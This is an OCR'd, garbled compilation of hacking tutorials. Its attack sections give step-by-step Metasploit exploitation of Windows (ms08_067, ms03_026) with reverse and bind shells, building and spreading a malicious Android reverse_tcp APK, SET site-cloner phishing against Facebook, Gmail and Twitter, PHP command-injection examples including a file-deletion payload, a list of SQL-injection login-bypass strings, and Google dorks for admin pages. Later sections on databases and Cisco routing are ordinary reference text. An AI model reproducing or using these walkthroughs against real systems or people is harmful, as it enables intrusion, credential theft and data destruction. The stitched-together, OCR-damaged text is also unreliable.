©exploit_simple [ exploit. rb: 162 ] (Msf::Simple::Exploit) 

E3 cmd_exploit [exploit.rb:148] (MsfUi: : Console: :CommandDispatcher::Exploit) 
© cmd_exploit [exploit.rb:148] (Msf::Ui::Console::CommandDispatcher::Exploit) 
© run_command [dispatcher_shell.rb:428] (Rex::lli::Text::DispatcherShell) 

© run_single [dispatcher_shell.rb:390] (Rex::Ui::Text::DispatcherShell) 

© run_single [dispatcher_shell.rb:384] (Rex::Ui::Text::DispatcherShell) 

© run ( shell.rb:200 ] (Rex::Ui::Text:Shell) 

© msfconsole:148 


-*■ Variables ■+• ^ 

^ ► (^Global variables 

▼ Jg info = Hash (14 elements)) 

► ?§ 'Arch' = Array (1 element(s)) 

► >i 'Author' = Array (3 element(s)) 

'Conve ntion' - > socke d i 

'Description'-> Listen for a connection, Inject the meterpreter server 
'Handler'->{Module) Msf::Handler::BindTcp 

► ii 'License' = Array (1 element(s)) 

'Name'->Windows Meterpreter (Reflective Injection). Bind TCP Stagei 

► 31 'PayloadCompat' = Hash (1 element(s)) 

► 'Platform' = Array (1 elements)) 

► j! 'References' = Array (1 element^)) 

'Session'->{Classl Msf::Sessions::Meterpreter_x86_Win 

► Jl 'Stage' = Hash (2 element(s)) 

► 31 'Stager' = Hash (3 elements)) 

'Version'->S Revision: 14774 S, SRevision: 15548 S, SRevision: 145 

S Rex::Sync::Event - (Class) Rex::Sync::Event 


self = {#<Class:0x007f930d3f5528>) #<#<Class:0x007f930d3f5j 


+ 


Watches 


No watches 


Msfconsole Command's - 

Back - Move back from the current context 

banner - Display an awesome metasploit banner 


cd - Change the current working directory 




color - Toggle color 

connect - Communicate with a host 

edit - Edit the current module with $VISUAL or $EDITOR 

exit - Exit the console 

get - Gets the value of a context-specific variable 
getg - Gets the value of a global variable 
go_ pro - Launch Metasploit web GUI 

grep - Grep the output of another command 
help - Help menu 

info - Displays information about one or more module 
irb - Drop into irb scripting mode 
jobs - Displays and manages jobs 
kill - Kill a job 



load - Load a framework plugin 

loadpath - Searches for and loads modules from a path 

makerc - Save commands entered since start to a file 

popm - Pops the latest module off the stack and makes it active 

previous - Sets the previously loaded module as the current module 

pushm - Pushes the active or list of modules onto the module stack 

quit - Exit the console 

reload_all - Reloads all modules from all defined module paths 

renamejob - Rename a job 

resource - Run the commands stored in a file 

route - Route traffic through a session 

save - Saves the active datastores 

search - Searches module names and descriptions 

sessions - Dump session listings and display information about sessions 



set - Sets a context-specific variable to a value 

setg - Sets a global variable to a value 

show - Displays modules of a given type, or all modules 

sleep - Do nothing for the specified number of seconds 

spool - Write console output into a file as well the screen 

threads - View and manipulate background threads 

unload - Unload a framework plugin 

unset - Unsets one or more context-specific variables 

unsetg - Unsets one or more global variables 

use - Selects a module by name 

version - Show the framework and console library version numbers 

Back - 

msf auxiliary(ms09_001_write) > back 
msf > 



Banner - 


msf > banner 

TF_ /_/ _ 

_| 1 1 1 _ l — M _ ^ / 

Frustrated with proxy pivoting? Upgrade to layer-2 VPN pivoting with 
Metasploit Pro - type 'go_pro' to launch it now. 

=[ metasploit v4.1 1 .4-2015071402 ] 

+ — =[ 1467 exploits - 840 auxiliary - 232 post ] 

+ — =[ 432 payloads - 37 encoders - 8 nops ] 



Check - 

msf exploit(ms08_067_netapi) > show options 


Module options (exploit/windows/smb/ms08_067_netapi): 
Name Current Setting Required Description 


RHOST 172.16.194.134 yes 

RPORT 445 yes 

SMBPIPE BROWSER yes 


The target address 
Set the SMB service port 
The pipe name to use (BROWSER, SRVSVC) 


Exploit target: 
Id Name 


0 Automatic Targeting 

msf exploit(ms08_067_netapi) > check 

[*] Verifying vulnerable status... (path: 0x0000005a) 

[*] System is not vulnerable (status: 0x00000000) 

[*] The target is not exploitable, 
msf exploit(ms08_067_netapi) > 


Color - 
msf > color 

Usage: color <'true'|'falseTauto'> 
Enable or disable color output 


Connect - 

msf > connect 192.168.1 .1 23 

[*] Connected to 192.168.1.1 :23 

DD-WRT v24 std (c) 2008 NewMedia-NET GmbH 

Release: 07/27/08 (SVN revision: 10011) 

DD-WRT login: 



Exit - 


msf exploit(ms10_061_spoolss) > exit 
root@kali:~# 


Payloads - 

msf exploit(ms08_067_netapi) > show payloads 


Tragets - 

msf exploit(ms08_067_netapi) > show targets 
Exploit targets: 

Id Name 


0 Automatic Targeting 

1 Windows 2000 Universal 

10 Windows 2003 SP1 Japanese (NO NX) 

1 1 Windows 2003 SP2 English (NO NX) 

12 Windows 2003 SP2 English (NX) 
...snip... 


1. PC Hacking 



Step 1: At first we are going to port scan the computer. For this we need to open Nmap and type the following command. 
nmap -sS -O 

In the place ofip> you have to write the victims ip address. If you see the ports 139 and 445 open then you can go ahead. 
Step 2: Now we have to open Metasploit (via terminal) and run it. 

Type the following command to get the exploits in the victim’s computer. 
show exploits 

You will get a list of exploits in the victim’s computer, which looks similar to ms05_039_pnp. Every such exploit 
correspond to different function. We are interested in an exploit which looks like this ms08_067_netapi. So we give a 
command as shown below. 

use window s/smb/ms08_067 _netapi 

Step 3: Now we use RHOST command to set the target ip. 

set RHOST 

And RPORT command to access port 445 


set RPORT 445 



Step 4: And now we give a command as 

set SMBPIPE SRVSVC 

And then, 

set TARGET 0 

Step 5: Now we got to set the payload hence the following command. 

set PAYLOAD windows/meterpreter/bindjcp 

Step 6: Time for the BIG BANG. . . ! Type exploit and hit enter. 

If you find the message which looks closer to “Meterpeter session 1 opened” then that implies you are done. You have 
successfully hacked into the computer. 

Now by using different commands we can steal the files on that system! 


2. Smartphone Hacking - 
Requirements: 

1. Metasploit framework (we use Kali Linux 1.0.6 in this tutorial) 


2. Android smartphone (we use HTC One android 4.4 KitKat) 


Step by Step Hacking Android Smartphone Tutorial using Metasploit: 

1 . Open terminal (CTRL + ALT + T) view tutorial how to create linux keyboard shortcut . 

2. We will utilize Metasploit payload framework to create exploit for this tutorial. 

msfpayload android/meterpreter/reverse_tcp LHOST=<attacker ip_address> 

LPORT=<port to_receive_connection> 

As described above that attacker IP address is 192.168.8.94, below is our screenshot when executed the command 

3. Because our payload is reverse_tcp where attacker expect the victim to connect back to attacker machine, attacker needs 
to set up the handler to handle incoming connections to the port already specified above. Type ms f console to go to 
Metasploit console. 

Info: 

use exploit /multi/handler -> we will use Metasploit handler 

set payload android/meterpreter /reverse_tcp -> make sure the payload is the same 
with step 2 

4. The next step we need to configure the switch for the Metasploit payload we already specified in step 3. 


Info: 


set lhost 192.168.8.94 -> attacker IP address 


set lport 443 -> port to listen the reverse connection 
exploit -> start to listen incoming connection 

5. Attacker already have the APK's file and now he will start distribute it (I don't need to describe how to distribute this file, 
internet is the good place for distribution. 

6. Short stories the victim (me myself) download the malicious APK's file and install it. After victim open the application, 
attacker Metasploit console get something like this: 

7. It's mean that attacker already inside the victim android smartphone and he can do everything with victim phone. 


26. Backtrack Basic 


Android Exploitation with Metasploit 

In this article, we will be looking into the practical usage of Backtrack, and its tools. The article is 
divided into three sections - Android Exploitation through Metasploit, Nikto Vulnerability Scanner and 
w3af. The reader is expected to have basic knowledge of Backtrack and familiar with common web application 
vulnerabilities. 


Use Metasploit in Backtrack 5 


Metasploit comes in several flavors: Metasploit 
framework, Metasploit community edition, Metasploit 
pro. In Backtrack 5, Metasploit framework is installed 
by default. Metasploit framework provides you with 
information on security vulnerabilities which can be used 
to exploit a system. Penetration testers can also use this 
tool to launch manual or automated scans. 


BackTrack 5 Toolkit Tutorial 

BackTrack is an operating system based on the Ubuntu 
GNU/Linux distribution aimed at digital forensics and 
penetration testing use. It is named after backtracking, 

a search algorithm. The current version is BackTrack 5, code name “Revolution.” 

What is a vulnerable system? 

A vulnerability is a weakness in software, hardware that 
enables the attacker to compromise the confidentiality, 
integrity or availability of that system. A system can 
be but not limited to: a server running an operating 
system, router switch, firewall, mobile devices, TV, etc. 

For example: when an attacker launches a distributed 
denial of service attack, he enables the unavailability 


of a system. If data is intercepted and changed, he 

enables integrity. An attacker can use a vulnerability to compromise a 

system. For example a weakness in a protocol allows 


the attacker to run arbitrary code. The attacker launches the exploit on the vulnerable system. Based on the 

actual payload send together 

with the exploit, the attacker receives a (reverse) 

shell. If you understand the vulnerability, it will help you to 

implement the appropriate security control. A security 

control can be a patch or a security device. Important to know is that you understand the vulnerability context 

• Where do they exist? 

• Where do they run? 

So, what is the exploit context? 

• Exploit runs where the vulnerability exists 

• Where does it run, client side or server side? 


Example 1 

Let say, you have a server located into the DMZ. The vulnerability context is the server itself and the 
exploit context is the DMZ. If an attacker can compromise a vulnerable server in the DMZ, he has 
properly access to all servers in that DMZ. The attacker can use other techniques like pivoting to 
access servers in the internal network. 


Example 2 

If a client computer is placed on a client LAN, the 



vulnerability context is the client and the exploit context 
in the client LAN. If an attacker can compromise a 

vulnerable client in the LAN, he has properly access to all resources on the client LAN. 


Client-side exploit 

If a vulnerability exist on a client, it can be compromised 
by a client-side exploit. Client side vulnerabilities lives 
in Java, operating system, applications such as web 
browser, Office, Acrobat Reader. The attack is basically 
launched by tricking the user to click on a link embedded 
in an email, or send the user an attachment which 
contains the exploit. When the user clicks on the link, the 
user is redirected to a website which contains the actual 
code to launch the exploit. A traditional firewall does not 
help this attack from happening, since the user opens 
a connection over port 443 or port 80. These ports are 
usually allowed on the firewall. Before a system can be 
exploited, you can take the following steps: 

• Choose and configure the module in Metasploit 

• Select a payload, which provides the attacker a 
remote shell 


BackTrack 5 


BackTrack 5 (BT5) is a Linux security distribution 
that contains all of the tools necessary to perform 
a complete security assessment of systems, 
networks, and applications. This article will describe 


some basic practical uses of the tools within BackTrack 
5 as they relate to a network-based penetration test or 
security assessment. BackTrack 5 was designed with 
penetration testing in mind. A pentest is a method of 
evaluating and testing the security of a system, network, 
or application by performing actions that are meant to 
simulate the actions of a malicious attacker. 

The tools included in BackTrack 5 are very often 
the same tools an attacker might be using against 
a network, and understanding these tools and how 
effective they might be against your network is an 
important step of security in-depth. The tools covered 
in this two-part article and their usage will be outlined 
in the same order that a network assessment might 
take place, starting with host discovery and information 
gathering on discovered targets, moving onto identifying 
vulnerabilities within your targets, followed by attempting 
exploitation of the discovered vulnerabilities, and finally, 
what to do with your newly gained access, also known 
as post-exploitation. Web application assessment tools 
will be covered as well. 

The first part of the article will cover the basics of 
BackTrack 5, simple host discovery and information 
gathering of an internal network, as well as a basic 
wireless assessment. Part two will cover the steps 


of discovery and information gathering for an 
external network assessment, as well as vulnerability 
assessment, exploitation, and post-exploitation. Some 
other useful tools will be covered as well. Keep in mind 



that there are many tools available in BT5 and many of their functions can overlap, and the information in this 
article doesn’t encompass all of the ways, nor the only way to perform these actions. Use this information as a 
starting point to discover the real capabilities of the toolkit. The version of BT5 used for in this article is 
BackTrack 5 R2 KDE 64-bit and there may be slight differences in commands and available applications if you 
are using a different version. 


BackTrack 5 Basics 

There are a few different ways BT5 can be setup and 
used. You can create a Live CD or bootable USB drive 
and run it in a live environment, install BT5 to virtual 
machine (VM), or install BT5 directly to a hard drive 
and boot to it as the main OS. Each method has its 
perks and drawbacks, but for the sake continually 
performing assessments and testing, creating a BT5 
VM is recommended. If you are new to BT5, the indepth 
details of setting up BT5 will not be covered in 
this article; however, the Official BackTrack 5 Wiki and 
Forums at http://www.backtrack-linux.org / contain all 
the information necessary for getting started. 

Once you are up and running, before starting any 
information gathering, you should create a place to 
store the information you are collecting. Some of the 


tools in BT5 utilize databases to store information and 
one of the strengths of BT5 is that the databases should 
be preinstalled and configured to start using without 
much hassle. Since the context of this article covers 


pentesting of multiple clients, creating a separate folder 
for each client is recommended. For this assessment, 
everything will be stored in subfolders in the -/PenTest 
directory, created for this demonstration. 


History 

Backtrack Linux is a custom Linux distribution designed 
to aid security professionals with attack simulation, 
vulnerability identification and verification, and general 
penetration testing activities. Backtrack was the end 
result of a combination of two separate (competing) 
security distributions. WHAX (formerly Whoppix) a 
security distro developed by Mati Ahoroni and Auditors 
Security Collection, developed by Max Moser were 
combined to create Backtrack. 

Backtrack version 4 and up are based on Ubuntu. 

The most recent release, as of this writing, is Backtrack 
5 R2 which runs a customized 3.2.6 Linux Kernel. This 
release touts many new tools and improvements, some 
of those being better support for wireless attacks, the 
Metasploit Community Edition (4.2.0) and version 3.0 

of the Social Engineering Toolkit. You can see more of the tools and release info here 
http:/ /www. backtrack! inux. 


org/backtrack/backtrack-5-r2-released/. 

You can download the latest (along with earlier 
releases) Backtrack release in ISO or VMware image 
formats from http://www.backtrack-linux.org. 


It is true that most of the tools that come bundled 
within Backtrack can be downloaded separately and 
do not require Backtrack to run. What makes Backtrack 
an ideal tool is that its entire environment is setup 
with security testing in mind. From the tools, scripts, 
dependencies, libraries and system configurations, 
every aspect of the end user experience in Backtrack 
has been set up to enable the user to perform security 
testing quickly, with limited to no configurations having 
to be made, since Backtrack is set up in a “turn key” 
fashion. 

I won’t say that Backtrack is the only OS I run during 
penetration tests. I usually have several systems going. 
But, I always have at least a Backtrack VM running 
because if I need a tool, and I don’t have Internet access 
to download it or I don’t have the time to configure it on a 
machine, more often than not it’s sitting on my Backtrack 
VM, ready to go with no configuration required. Similarly, 
when in a security analyst (defensive) role, having quick 
access to the pre-configured Backtrack environment 
reaps similar benefits when on a pen test and when 
needing to perform quick network analysis, or verify a 
vulnerability. 


How To Hack Facebook Via Backtrack 5 



Step By Step - 

1. Type “msfconsole” 

2. cd /pentest/exploits/set 

3. ./set 

4. Now just select 1st option (1 Social-Engineering Attacks) hit enter 

5 . hit enter after that 2nd number 

6 . Now Just select 4th Option "Tabnabbing Attack Method" and Hit ENTER 

7 . Then select 2nd option "Site Cloner" and Hit ENTER 

8 . Now here you need to add the URL of Facebook and just hit enter 

9 . Open new terminal and just type ifconfig and hit ENTER 
10 . Now just copy this IP address and open it in Browser. 

11 . Done 

Note : - This tutorial is just educational purpose only. 


How To Hack Gmail Via Backtrack 5 



Step By Step - 

1. Type “msfconsole” 

2. cd /pentest/exploits/set 

3. ./set 

4 . Now just select 1st option (1 Social-Engineering Attacks) hit enter 

5 . hit enter after that 2nd number 

6 . Now Just select 4th Option "Tabnabbing Attack Method" and Hit ENTER 

7 . Then select 2nd option "Site Cloner" and Hit ENTER 

8 . Now here you need to add the URL of Gmail and just hit enter 

9 . Open new terminal and just type “ifconfig" and hit ENTER 
10 . Now just copy this IP address and open it in Browser. 

11 . Done 

Note : - This tutorial is just educational purpose only. 


How To Hack Twitter Via Backtrack 5 


Step By Step 



1. Type “msf console” 

2. cd /pentest/exploits/set 

3. ./set 

4 . Now just select 1st option (1 Social-Engineering Attacks) hit enter 

5 . hit enter after that 2nd number 

6 . Now Just select 4th Option "Tabnabbing Attack Method" and Hit ENTER 

7 . Then select 2nd option "Site Cloner" and Hit ENTER 

8 . Now here you need to add the URL of Twitter and just hit enter 

9 . Open new terminal and just type ifconfig and hit ENTER 
10 . Now just copy this IP address and open it in Browser. 

11 . Done 

Note : - This tutorial is just educational purpose only. 


How To Hack Windows Xp Via Backtrack 5 


Step By Step - 



1 . Open Terminal And Type "msfconsole" 

2 . msf > search dcom 

3 . msf > use exploit/windows/dcerpc/ms03_026_dcom 

4 . msf > show options 

5 . msf > set RHOST 10.0.0.3 

6 . msf > show payloads 

7 . msf > set PAYLOAD generic/shell_reverse_tcp 

8 . msf > set LHOST 10.0.0.6 

9 . msf > exploit 

10 . Open a Shell on the Hacked System 

1 1 . sessions -i 1 
12 . C: >dir 


27. SQL Server , Oracle Server Basic 


What is SQL? 


SQL is Structured Query Language, which is a computer language for storing, manipulating and retrieving data 
stored in relational database. 

SQL is the standard language for Relation Database System. All relational database management systems like 
MySQL, MS Access, Oracle, Sybase, Informix, postgres and SQL Server use SQL as standard database 
language. Also, they are using different dialects, such as: 

□ MS SQL Server using T-SQL, 

□ Oracle using PL/SQL, 

□ MS Access version of SQL is called JET SQL (native format) etc. 


Why SQL? 

@ Allows users to access data in relational database management systems. 

□ Allows users to describe the data. 

□ Allows users to define the data in database and manipulate that data. 

□ Allows to embed within other languages using SQL modules, libraries & pre-compilers. 


□ Allows users to create and drop databases and tables. 


• Allows users to create view, stored procedure, functions in a database. 
□ Allows users to set permissions on tables, procedures and views 



History: 


01970 -- Dr. E. F. "Ted" of IBM is known as the father of relational databases. He described a relational model 
for databases. 

□ 1974 -- Structured Query Language appeared. 

□ 1978 -- IBM worked to develop Codd's ideas and released a product named System/R. 

□ 1986 -- IBM developed the first prototype of relational database and standardized by ANSI. The first relational 
database was released by Relational Software and its later becoming Oracle. 


SQL Process: 

When you are executing an SQL command for any RDBMS, the system determines the best way to carry out 
your request and SQL engine figures out how to interpret the task. 

There are various components included in the process. These components are Query Dispatcher, Optimization 
Engines, Classic Query Engine and SQL Query Engine, etc. Classic query engine handles all non-SQL queries, 
but SQL query engine won't handle logical files. 


What is RDBMS? 

RDBMS stands for Relational Database Management System. RDBMS is the basis for SQL and for all modern 
database systems like MS SQL Server, IBM DB2, Oracle, MySQL, and Microsoft Access. 

A Relational database management system (RDBMS) is a database management system (DBMS) that is based 
on the relational model as introduced by E. F. Codd. 



What is table? 


The dataO in RDBMS is stored in database objects called tables. The table is a collection of related data entries 
and it consists of columns and rows. 


MySQL 

MySQL is an open source SQL database, which is developed by Swedish company MySQL AB. MySQL is 
pronounced "my ess-que-ell," in contrast with SQL, pronounced "sequel." 

MySQL is supporting many different platforms including Microsoft Windows, the major Linux distributions, UNIX, 
and Mac OS X. 

MySQL has free and paid versions, depending on its usage (non-commercial/commercial) and features. MySQL 
comes with a very fast, multi-threaded, multi-user, and robust SQL database server. 


History: 

m Development of MySQL by Michael Widenius & David Axmark beginning in 1994. 
□ First internal release on 23 May 1995. 



□ Windows version was released on 8 January 1998 for Windows 95 and NT. 

□ Version 3.23: beta from June 2000, production release January 2001 . 

□ Version 4.0: beta from August 2002, production release March 2003 (unions). 

□ Version 4.01 : beta from August 2003, Jyoti adopts MySQL for database tracking. 

□ Version 4.1 : beta from June 2004, production release October 2004. 

□ Version 5.0: beta from March 2005, production release October 2005. 

□ Sun Microsystems acquired MySQL AB on 26 February 2008. 

□ Version 5.1: production release 27 November 2008. 

Features: 

m High Performance. 

□ High Availability. 


□ Scalability and Flexibility Run anything. 

□ Robust Transactional Support. 

□ Web and Data Warehouse Strengths. 



□ Strong Data Protection. 

□ Comprehensive Application Development. 

□ Management Ease. 

□ Open Source Freedom and 24 x 7 Support. 

□ Lowest Total Cost of Ownership. 

MS SQLServer 

MS SQL Server is a Relational Database Management System developed by Microsoft Inc. Its primary query 
languages are: 

□ T-SQL. 

□ ANSI SQL. 


History: 

01987 - Sybase releases SQL Server for UNIX. 

□ 1988 - Microsoft, Sybase, and Aston-Tate port SQL Server to OS/2. 



□ 1989 - Microsoft, Sybase, and Aston-Tate release SQL Server 1 .0 for OS/2. 

□ 1 990 - SQL Server 1 . 1 is released with support for Windows 3.0 clients. 

□ Aston-Tate drops out of SQL Server development. 

□ 2000 - Microsoft releases SQL Server 2000. 

□ 2001 - Microsoft releases XML for SQL Server Web Release 1 (download). 

□ 2002 - Microsoft releases SQLXML 2.0 (renamed from XML for SQL Server). 

□ 2002 - Microsoft releases SQLXML 3.0. 

Features: 

0 High Performance. 

□ High Availability. 

□ Database mirroring. 


□ Database snapshots. 

□ CLR integration. 



□ Service Broker. 


□ DDL triggers. 

□ Ranking functions. 

□ Row version-based isolation levels. 

□ XML integration. 

□ TRY.. .CATCH. 

□ Database Mail. 

ORACLE 

It is a very large and multi-user database management system. Oracle is a relational database management 
system developed by 'Oracle Corporation'. 

Oracle works to efficiently manage its resource, a database of information, among the multiple clients requesting 
and sending data in the network. 

It is an excellent database server choice for client/server computing. Oracle supports all major operating 
systems for both clients and servers, including MSDOS, NetWare, UnixWare, OS/2 and most UNIX flavors. 


History: 

Oracle began in 1977 and celebrating its 32 wonderful years in the industry (from 1977 to 2009). 



□ 1977 - Larry Ellison, Bob Miner and Ed Oates founded Software Development Laboratories to undertake 
development work. 

□ 1979 - Version 2.0 of Oracle was released and it became first commercial relational database and first SQL 
database. The company changed its name to Relational Software Inc. (RSI). 

□ 1981 - RSI started developing tools for Oracle. 

□ 1982 - RSI was renamed to Oracle Corporation. 

• 1983 - Oracle released version 3.0, rewritten in C language and ran on multiple platforms. 

□ 1984 - Oracle version 4.0 was released. It contained features like concurrency control - multi-version read 
consistency, etc. 

□ 1985 - Oracle version 4.0 was released. It contained features like concurrency control - multi-version read 
consistency, etc. 

□ 2007 - Oracle has released Oraclel 1g. The new version focused on better partitioning, easy migration, etc. 


Features: 

m Concurrency 


□ Read Consistency 

□ Locking Mechanisms 

□ Quiesce Database 



□ Portability 

□ Self-managing database 

□ SQL*Plus 

□ ASM 

□ Scheduler 

□ Resource Manager 

□ Data Warehousing 

□ Materialized views 

□ Bitmap indexes 

□ Table compression 

□ Parallel Execution 

□ Analytic SQL 

□ Data mining 

□ Partitioning 


28. SQL Injection 


Common vulnerabilities 



1. SQL InjectionBrowser sends malicious input to server 

2. Bad input checking leads to malicious SQL query 

XSS -Cross-site scripting 

1. Bad web site sends innocent victim a script that steals information from an honest web site 

CSRF -Cross-site request forgery 

1. Bad web site sends request to good web site, using credentials of an innocent victim who "visits" site 

Other problems 

HTTP response splitting, bad certificates, ... 


General code injection attacks 

1. Enable attacker to execute arbitrary code on the server 

2. Example: code injection based on eval(PHP) 
http://site.com/calc.php (server side calculator) 


$in = $_GET['exp']; 
eval('$ans= ' . $in . 



Attack: http://site.com/calc.php?exp=" 10 ; system('rm*.*') " 


(URL encoded) 


Code injection using system () 

Example: PHP server-side code for sending email 

$email = $_POST["email"] 

$subject = $_POST["subject"] 

system("mail $email -s $subject < /tmp/joinmynetwork") 


Attacker can post 

http://yourdomain.com/mail.php ? 

email=hacker@hackerhome.net & 
subject=foo< /usr/passwd; 


Database queries with PHP 

(the wrong way) 


Sample PHP 

$recipient = $_POST['recipient']; 

$sql= "SELECT PersonIDFROM People WHERE 
Username='$recipient' 

$rs= $db->executeQuery($sql); 


Problem - 


Untrusteduser input 'recipient' is embedded directly into SQL command 


Note - 


The best sql injection software is Havij 

If you want login any website - 
Plz follow the step - 

1. type in user field ('OR' l'= '1 ) 

2. type in password field (' OR ' l'= '1 ) 


Other InjecTion Queries: 

('or 1=1-) 

(l'or'l-'l) 

(admin'-) 

(" or 0=0 -) 

(or 0=0 -) 

('or 0=0 #) 

(" or 0=0 #) 

(or 0=0 #) 

(' or Y=’x) 

(" or "x"="x) 

{ ') or ('x'-x } 

('or 1=1-) 

(" or 1=1-) 

(or 1=1-) 

(' or a=a-) 

(" or "a"="a) 



{ ') or ('a'=’a } 


{ ") or ("a"="a } 

(hi" or "a"="a) 

(hi" or 1=1-) 

(hi' or 1=1-) 

(hi' or'a'='a) 

{ hi') or ('a'='a } 

{ hi") or ("a"=") } 


How to find any website login page - 
Type in google - 

1. Inurhadminlogin.aspx 

2. Inurhadmin/index.php 

3. Inurhadministrator.php 

4. Inurkadministrator.asp 

5. Inurhlogin.asp 

6. Inurhlogin.aspx 

7. Inurklogin.php 


29. Routers 


Routers - • Data is sent in form of packets between two end devices 


Routers are used to direct packets to its destination 


• Routers examine a packets destination IP address and 
determine the best path by using a routing table 



192.168.1.0/24 


192.168.3.0/24 


Rl#show ip route 

Codes: C - connected, S - static, I - 
D - EIGRP, 2X - EIGRP external 
Nl - OSPF NSSA external type 1 
El - OSPF external type 1, S2 
i - IS-IS, LI - IS-IS level-1, 
inter area 

* - candidate default, U - per-user static route, o 
P - periodic downloaded static route 

Gateway of last resort is not set 

192 . 168.1 ^/24 is directl y c o nne c ted , Fa stEthernetO/Q 

C 192.168.2.0/24 is directly connected, Serial0/0 

S 192.168.3.0/24 is directly connected, Serial0/0 


I GRP, R - RIP, M - mobile, B - BGP 
0 - OSPF, IA - OSPF inter area 
N2 - OSPF NSSA external type 2 
OSPF external type 2, E - SGP 
L2 - IS-IS level -2, ia - IS-IS 

ODR 


Routers use the routing table 
like a map to discover the best 
path for a given address. 


Cisco IOS Software - 

.Operating system in all of the Cisco routers or switches, which provides 
the following network services: 

• Basic routing and switching functions 

• Reliable and secure access to networked resources 




Network scalability 


Router components - 
•CPU 

- Executes operation systems instructions 

• RAM 

- Stores instructions and data needed for CPU 

• ROM 

- Boot instructions, scaled-down vers, of IOS 

• Flash 

- Stores IOS, copied into RAM during bootup proc. 

• NVRAM 

- Startup configuration file 


Router Boot-up process - 

• Major phases to the router boot-up 
process 

• Test router hardware 

• Power-On Self Test 

(POST) 

• Execute bootstrap loader 

• Locate & load Cisco IOS 


software 

• -Locate IOS 

• -Load IOS 

• Locate & load startup 

configuration file or enter setup mode 

• -Bootstrap program looks for configuration 
file 


1 . 

2 . 

3 . 

4 . 

5 . 

6 . 


ROM 

ROM 

Flash 

TFTP Server 

NVRAM 

TFTP 

Server 

Console 


POST 

Perform POST 


Boostrap 

Load Bootstrap 


Cisco 

Internetwork 

Operation 

System 

Locate and load 
Operating system 


Configuration 

Locate and load 
configuration file 
or 

enter setup mode 


7 . 






IOS File System - 


RAM 



Running 

Configuration 

NVRAM 

Startup 

Configuration 


Flash 


IOS Image 


Router interfaces 

• Interface: a physical connector on the 
router, main purpose to receive and 
forward packets 

• Interfaces connects to various types of 
networks, and different types of media 
and connectors are required 

• Each interface connects to a separate 
Network 





• LAN interfaces 

- Ethernet, fastEthernet 

- Connects the router to a LAN 

• WAN interfaces 

-Serial, ISDN, Frame Relay 

- Connects the router to external networks, 
interconnect LANs 


Routing 

• Process to forward packets to destination networks 

• Layer 3 device 

• Examines destination IP address (Layer 3) 

• Routing table is used to find best path to Destination 

• Forwarding decisions based on Layer 3 

• Operates at Layer 1 , 2 and 3 


192.168.1.0/24 


Router Operates at Layers 1. 2. and 3 

192.168.2.0/24 R2 192.168.3.0/24 


192.168.4.0/24 


a R1 R2 R3 

.1 — ~r 2 r jj pc 2 

FaO/O * ™FaO/1 FaO/O * ™S0/0 S0/0 ' ^FaO/O 


192.168.1.10 
PCI 


192.168.4.10/24 
PC2 



Routing Table - 

• Data file in RAM 

• Stores information about directly connected and remote networks 

• Contains network/next hop associations 

• Directly connected networks 

• Remote networks 

- Static routes (manually configured) 

- Dynamic routing protocols (learned from other routers) 


Static Routing 

• Configured manually 

• Specifies network address and subnet mask of remote network, and IP 
address of next hop router or exit interface 



• Use static routes when: 

- Network only consists of few routers 

- Network is connected to Internet only through one ISP 

Advantages: 

• Minimal CPU processing 

• Easy to configure 

• Easier for administrator to understand 


Disadvantages: 

• Configuration and maintenance is timeconsuming 

• Does not scale well with growing Networks 

• Requires complete knowledge of the whole network for proper 
implementation 


Connected and Static Routes 



192.168.1.0/24 

¥ 1 


192.168.2.0/24 
^S0/0/0 


m 


so/o/o 


DCE 


192.168.3.0/24 

FaO/O 

.1 



Static routes 


▼ 

Rl#show ip route _ __ 

Codes: C - connected, |s - staticj I - IGRP, R - RIP, M - mobile, B - BGP 
D - EIGRP, EX - El GRP external, 0 - OSPF, IA - OSPF inter area 
N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2 
El - OSPF external type 1, E2 - OSPF external type 2, E - EGP 
i - IS-IS, LI - IS-IS level-1, L2 - IS-IS level-2, ia - IS-IS inter area 
* - candidate default, U - per-user static route, o - ODR 
P - periodic downloaded static route 


Gateway of last resort is not set 


c 

192.168.1.0/24 

is directly connected. 

FastEthernet0/0 

9 

192.168.2.0/24 


Serial0/0 

L_ 

192.168.3.0/24 

[1/0] via 192.168.2.2 

] 


Dynamic routing 

• Added to routing table by using a dynamic routing protocol 

• Used by routers to share information about the reachability and status of 
remote networks 

• Perform several activities: 

- Network discovery 

- Updating and maintaining routing tables 

Advantages: 

• Less administrative overhead when adding or deleting a network 

• Protocols automatically react to the topology changes 



More scalable 


Disadvantages: 

• Router resources are used (CPU cycles, memory and link bandwidth) 

• More administrator knowledge is required for configuration, verification 
and troubleshooting 


Connected, Static and Dynamic Routes 



192.168.1.0/24 


Fa0/0 


.1 


m 


192.168.2.0/24 
S0/0/0 


192.168.3.0/24 


DCE 

.1 


-S0/0/' 




Fa0/0 


Fa0/1 

.1 

192.168.4.0/24 


w Dynamic Routes 


0 


Rl#show ip route 

Codes: C - connected, S - static, I - IGRP, |r - RIP,; M - mobile, B - BGP 

D - EIGRP, EX - El GRP external, 0 - OSPF, IA - OSPF inter area 
N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2 
El - OSPF external type 1, E2 - OSPF external type 2, E - EGP 
i - IS-IS, LI - IS-IS level-1, L2 - IS-IS level-2, ia - IS-IS inter 
area 

* - candidate default, U - per-user static route, o - ODR 
P - periodic downloaded static route 
Gateway of last resort is not set 

C 192.168.1.0/24 is directly connected, FastEthernet0/0 

C 192.168.2.0/24 is directly connected, Serial0/0/0 

S 192.168.3.0/24 [1/0] via 192.168.2.2 

R 192.168.4.0/24 [120/1] via 192.168.2.2, 00:00:20, Serial0/0/0 



Switching Function 

• Process used by a router to accept a packet on one interface and forward 
it out another interface 

• Decapsulate the Layer 3 packet by removing Layer 2 frame header and 
trailer 

• Examines destination IP address of the packet to find best path in routing 
table 

• Encapsulate Layer 3 packet into a new Layer 2 frame and forwards on 
correct interface 

Example 

•PCI will send a packet to PC 2 


A Day in the Life of a Packet: Step 1 


192.168.1.0/24 


jBSStm Fa0/0 ^ 
00-10 


192.168.2.0/24 
1 .2 


192.168.1.10 

0A-10 


Fa0/1 

00-20 


Fa0/0 

OB-31 


PCI's ARP Cache for R1 


IP Address 
192.168.1.0 


MAC Address 
00-10 


192.168.3.0/24 



.1 


.2 


so/o/o so/o/o 


Layer 2 Data Link Frame 


Dest Mac 

00-10 


Source Mac 

0A-10 


Type 800 


192.168.4.0/24 


feSj.l 

^ Fa0/0 . 1 

0C-22 


Dest. IP 
192.168.4.10 

Source IP 
192.168.1.10 

IP Fields 

Data 


